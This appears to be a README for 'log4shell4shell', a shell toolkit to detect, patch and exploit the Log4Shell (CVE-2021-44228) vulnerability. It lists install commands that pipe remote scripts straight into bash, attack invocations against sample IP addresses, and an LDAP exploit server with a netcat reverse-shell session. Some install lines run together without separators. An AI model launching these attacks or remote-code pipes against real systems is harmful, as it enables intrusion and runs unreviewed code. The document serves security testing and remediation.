
Log4shell - Multi-Toolkit. Find, Fix & Test possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment on shell
Log4j - Multitool. Find & fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment

apt update ; apt install default-jre screen python3-pip bash curlzypper ref ; zypper in default-jre screen python3-pip bash curlyum clean; yum install default-jre screen python3-pip bash curlpkg install default-jre screen python3-pip curl/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pipwget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
Run screen -r l4s4s-ldap-srv and/or screen -r l4s4s-nc-rsh to view some attacking infos in Exploit-Server shell:
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
_| _| _| _| _| _| _| _| _| _| _|
_| _|_| _|_|_| _| _| _|_|_| _|_|_| _|_| _| _| _| _| _|_|_| _|_|_| _|_| _| _|
_| _| _| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _|
_| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_| _| _| _| _| _|
_|_|_|_| _|_| _|_|_| _| _|_|_| _| _| _|_|_| _| _| _| _|_|_| _| _| _|_|_| _| _|
_|
_|_|
> Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm
Wrong input! Please enter one of these options:
Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
--get-powershell-finder
--check-system
--fix-log4j
--run-dummy-server <JNDIExploit.*.zip>
--run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
--python-scan <command>
Just run my helper-script (--list-versions): ./python-upgrader.sh
Just run in Powershell (admin-mode): .\set_windows_fix.ps1
The project log4shell4shell is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.